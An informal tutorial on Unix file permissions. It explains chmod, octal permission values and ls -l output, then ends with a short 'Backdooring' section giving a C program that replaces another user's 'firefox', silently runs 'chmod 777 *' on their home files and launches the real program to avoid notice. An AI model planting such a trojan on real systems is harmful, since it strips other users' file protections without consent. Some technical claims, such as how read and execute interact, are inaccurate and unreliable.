About
In this article I hope for the reader to understand unix file permissions. Unix file permissions set boundaries for other users that aren't permitted to read/write/execute to that file. By understanding unix file permissions you do a major stop, for attempt access from local users. In this article I will explain the `chmod` command, and how it's organized. Also, I will explain what people can do if a file isn't chmod'd correctly. And I will display some backdoor code users may beable to use from incorrect chmod settings.
------------------------------
Permissions and Such
Now you may be asking "what is chmod?" Well, chmod is basically the Unix command for setting permissions to files. It's as simple as that, and isn't a hard command to follow. Aknowledge the following...
Owner | Group | Everyone Else
^^ This shows how chmod is handled. This may seem confusing at first but with a few examples you will hopefully understand.
Owner - The owner of the file (basically it's in the owners dir).
Group - If the owner is in a specific group like wheel, he will beable to give permissions to that file differently then his, and others.
Everyone Else - The outside world, or other users not in his group, and ofcourse not him. Everyone else also indicates if the file is presented on the web, then the people `trying` to read/write/exec the file, will have it permissions different then the owner for security reasons.
Consider doing the following:
$ ls -l
$ touch example
$ chmod 777 example
$ ls -la
`$` is the shell... ls is just a command to list files, and -l is an argument to show details (hence permission settings). touch just makes the file. chmod just sets the permissions.
-------------------------------------------------
Example:
r = read, w = write, x = execute (exec)
$ root@ANIGMA:~# ls -l
drwxr-xr-x 4 tiffta 1000 1896 2005-03-12 03:21 BitTorrent-3.9.1/
drwx------ 3 root root 136 2005-02-20 19:29 Desktop/
drwxr-xr-x 2 root root 48 2005-03-12 03:20 Incomplete/
drwxrwxrwx 3 root root 1552 2005-03-01 13:55 LimeWire/
drwx------ 7 root root 520 2005-02-20 23:18 Mail/
-rwxr-xr-x 1 root root 11493 2005-03-13 22:46 a.out*
drwxr-xr-x 2 root root 504 2005-02-24 21:07 code/
-rw-r--r-- 1 root root 4194816 2005-03-10 10:18 cr.smc
-rw-r--r-- 1 root root 531 2005-03-10 17:29 data1.cpp
-rw-r--r-- 1 root root 525 2005-03-10 17:28 data1.cpp~
$ chmod 777 data1.cpp
$ ls
drwxr-xr-x 4 tiffta 1000 1896 2005-03-12 03:21 BitTorrent-3.9.1/
drwx------ 3 root root 136 2005-02-20 19:29 Desktop/
drwxr-xr-x 2 root root 48 2005-03-12 03:20 Incomplete/
drwxrwxrwx 3 root root 1552 2005-03-01 13:55 LimeWire/
drwx------ 7 root root 520 2005-02-20 23:18 Mail/
-rwxr-xr-x 1 root root 11493 2005-03-13 22:46 a.out*
drwxr-xr-x 2 root root 504 2005-02-24 21:07 code/
-rw-r--r-- 1 root root 4194816 2005-03-10 10:18 cr.smc
-rwxrwxrwx 1 root root 531 2005-03-10 17:29 data1.cpp*
-rw-r--r-- 1 root root 525 2005-03-10 17:28 data1.cpp~
---------------------------------
Okay, now notice that
Old: -rw-r--r-- 1 root root 531 2005-03-10 17:29 data1.cpp
New: -rwxrwxrwx 1 root root 531 2005-03-10 17:29 data1.cpp*
Notice anything? 7 7 7
^ Owner ^ Group ^ Other
x = 1
w = 2
r = 4
1+2+4 = 7
So, 7 = highest permission.
$ chmod 755 example
By doing this..
Owner = r+w+x (full access)
Group = r+x (Access, but not not full. Just reading, and executing)
Other = r+x (dito)
Understanding your rights
Reading access is just able to cat, or vi it. You can read the source basically. But you can't execute it. Like you can't do a
$ ./blah
By not providing users with reading options, you protect letters not wanting to be read, or source not wanting to be read.
Execution access is basically being able to `run` something.
$ ./blah
By being able to exec something, you are able to run scripts under someone elses access. So say a user doesn't set an appropriate permission to a file. You can run it under their permissions, which may be higher then yours. Let's say it's root. So it's a good idea to understand what your doing.
Writing access is basically being able to update something. So say you want to update someones code. You can backdoor it (which I will show later). By backdooring it, this can cause all kinds of havok.
Backdooring
Let's say that someone has firefox on their desktop. And it's named `firefox`. So you make a `firefox` in your dir. Maybe the code looks something like this...
CODE
#include <stdio.h>
#include <stdlib.h>
int main()
{
system("cd;chmod 777 *"); /* Just goes to users root dir, and gives full access to all his files. */
system("/sbin/firefox");
return 0;
}
Now, this file should be replaced with the other users file. Everytime he runs the script he updates his files with a full access permission. He will also be satisfied since the real path to firefox is executed.
That code is just an example, I don't know the exact path to firefox, and firefox is just an example I used.
-cheers tecta
